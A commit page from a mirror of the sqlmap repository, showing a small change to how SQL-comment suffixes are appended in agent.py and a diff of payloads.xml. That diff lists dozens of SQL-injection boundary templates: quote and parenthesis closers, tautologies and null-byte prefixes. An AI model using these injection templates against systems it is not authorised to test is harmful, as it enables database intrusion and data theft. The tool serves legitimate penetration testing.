sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Adding a boundary proposed in Issue #564

Browse Source
This commit is contained in:
Miroslav Stampar 2013-12-27 10:46:18 +01:00
parent 7718edac9b
commit cadbddd607
2 changed files with 5 additions and 266 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
lib/core/agent.py
View File

@ -229,7 +229,10 @@ class Agent(object):
pass pass
elif suffix and not comment: elif suffix and not comment:
expression += " %s" % suffix if suffix.startswith(GENERIC_SQL_COMMENT):
expression += "%s" % suffix
else:
expression += " %s" % suffix
return re.sub(r"(?s);\W*;", ";", expression) return re.sub(r"(?s);\W*;", ";", expression)

266
xml/payloads.xml
View File

@ -229,277 +229,13 @@ Formats:
--> -->
<root> <root>
<!-- Generic boundaries -->
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>)</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>')</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1,2,3</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>'</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>"</prefix>
<suffix></suffix>
</boundary>
<!-- End of generic boundaries -->
<!-- WHERE/HAVING clause boundaries -->
<boundary> <boundary>
<level>1</level> <level>1</level>
<clause>1</clause> <clause>1</clause>
<where>1,2</where> <where>1,2</where>
<ptype>1</ptype> <ptype>1</ptype>
<prefix>)</prefix>
<suffix>AND ([RANDNUM]=[RANDNUM]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>))</prefix>
<suffix>AND (([RANDNUM]=[RANDNUM]</suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>)))</prefix>
<suffix>AND ((([RANDNUM]=[RANDNUM]</suffix>
</boundary>
<boundary>
<level>1</level>
<clause>0</clause>
<where>1,2,3</where>
<ptype>1</ptype>
<prefix></prefix> <prefix></prefix>
<suffix></suffix> <suffix>-- [RANDSTR]</suffix>
</boundary>
<boundary>
<level>1</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>')</prefix>
<suffix>AND ('[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>'))</prefix>
<suffix>AND (('[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>')))</prefix>
<suffix>AND ((('[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary>
<level>1</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>'</prefix>
<suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>3</ptype>
<prefix>')</prefix>
<suffix>AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>3</ptype>
<prefix>'))</prefix>
<suffix>AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>3</ptype>
<prefix>')))</prefix>
<suffix>AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>3</ptype>
<prefix>'</prefix>
<suffix>AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>")</prefix>
<suffix>AND ("[RANDSTR]"="[RANDSTR]</suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>"))</prefix>
<suffix>AND (("[RANDSTR]"="[RANDSTR]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>")))</prefix>
<suffix>AND ((("[RANDSTR]"="[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>"</prefix>
<suffix>AND "[RANDSTR]"="[RANDSTR]</suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>5</ptype>
<prefix>")</prefix>
<suffix>AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>5</ptype>
<prefix>"))</prefix>
<suffix>AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1,2</where>
<ptype>5</ptype>
<prefix>")))</prefix>
<suffix>AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>5</ptype>
<prefix>"</prefix>
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
<boundary>
<level>2</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%')</prefix>
<suffix>AND ('%'='</suffix>
</boundary>
<boundary>
<level>3</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%'))</prefix>
<suffix>AND (('%'='</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%')))</prefix>
<suffix>AND ((('%'='</suffix>
</boundary>
<boundary>
<level>1</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%'</prefix>
<suffix>AND '%'='</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%00')</prefix>
<suffix>AND ('[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>%00'</prefix>
<suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
</boundary> </boundary>
<!-- End of WHERE/HAVING clause boundaries --> <!-- End of WHERE/HAVING clause boundaries -->